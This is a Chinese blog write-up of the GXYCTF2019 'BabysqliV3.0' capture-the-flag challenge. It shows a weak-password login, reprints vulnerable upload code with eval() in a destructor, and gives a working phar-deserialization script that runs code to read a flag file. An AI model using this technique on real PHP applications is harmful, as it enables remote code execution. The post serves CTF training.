[GXYCTF2019]BabysqliV3.0

最新推荐文章于 2024-02-05 14:00:03 发布
最新推荐文章于 2024-02-05 14:00:03 发布
阅读量611 收藏 1
点赞数
分类专栏: php序列化 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128627908
版权

发现我们随便上传一个以后返回的是

alert('Wrong pass');   密码错误

如果上传一个账号永真的话返回

Not this user!

没有这个用户,所以感觉可以使用盲注,对账号进行盲注

可是题目

ascii(substr((select database()),1,1))>1 也不对

最后才知道是一个弱密码登陆,admin   password有点没想到

登陆进去看见了get传参,伪协议读取,只不过是自动加了php后缀

home.php

<?php
session_start();//开启session
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
	if(isset($_GET['file'])){//file进行传参
		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){//正则过滤,禁了 flag
			die("hacker!");
		}
		else{
			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";//home和upload自动加php
			}
			else{
				$file = $_GET['file'].".fxxkyou!";
			}
			echo "当前引用的是 ".$file;
			require $file;
		}
		
	}
	else{
		die("no permission!");
	}
}
?>

upload.php

chatuwu

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;
	

	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

 可以看到__destruct魔法函数中有一个eval危险方法,所以我们要利用 这个方法。

可以看到整个类没有反序列化的操作,然后又是文件上传很容易想到phar序列化,

if($this->token != $_SESSION['user'])

我们需要满足这个认证是成功的,所以需要找到这个session['user']

在析构方法中找到了,$this->Filename = $sandbox.$_SESSION['user'].$ext;

上传两次就可以获得,txt前面就是token认证

 然后看见了是/var/www/html猜测flag.php就在这个目录的下面

为什么需要上传两次呢这是因为,执行cmd的方法是在destruct,上传第二次,第一次的就会销毁然后就会执行第一次的结果。

<?php
class Uploader{
    public $Filename='test';
    public $cmd='highlight_file("/var/www/html/flag.php");';
    public $token='GXYe3f43ab2c8516edac699d4649327bb1f';

}

$a = new Uploader();
$phar = new Phar('abbbbb.phar');
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();




?>

这里的test是为了绕过if(preg_match("[^a-z0-9]", $this->Filename)),只能是纯字母或者纯数字

然后得到phar的路径,进行name=phar://路径 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GXYCTF2019--BabySQli
Oavinci的博客
06-28 703
知识点: 查询数据不存在时,联合查询会构造一个虚拟的数据在数据库中。 随意输入点击登录,查看源代码得到一串字符串 base32+base64解码得到: select * from user where username = '$name' fuzz一下发现过滤了一些字符串。首先大写绕过"Order by 3#",查询列数为3,猜测为id,username,password。 这题考察的是用户名和密码分开检验,先将username对应的字段查出来后,再检验password和查出来的密码能不能
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4713
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF2019]BabySQli
weixin_43749601的博客
10-28 156
打开题目发现是一个登录界面,尝试一下admin,admin弱口令登录,结果提示wrong pass!,查看源码,发现一串特殊的字符。 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 然后对其先进base32解密,然后再进行base64解密,得到: select * from user where username = '$name' 接着猜解表中有几个列 a.
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链
u013119911的博客
06-30 1323
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
[GXYCTF2019]BabysqliV3.0-phar反序列化正解
soldi_er的博客
06-08 483
文章目录phar反序列化漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar反序列化漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2642
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当没有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
C#做的超市管理系统。
11-17
用c#+sqlsever2005做的超市管理系统,暑假的课程设计。
2017-2019蓝桥杯省赛题解.rar
03-23
2017-2019蓝桥杯省赛题解
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 728
主要是一个buuctf题目的解题过程,大家可以参考一下
BUUCTF [GXYCTF2019]BabySQli实战
永远是少年
12-14 597
今天继续给大家介绍CTF刷题,本文主要内容是BUUCTF [GXYCTF2019]BabySQli实战。 一、题目基本情况 二、解题思路 三、题目评析
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码的哈希值。在第三个引用中,进行了一个简单的测试,通过联合查询将用户名设置为'zhangsan'并选择了一些假数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值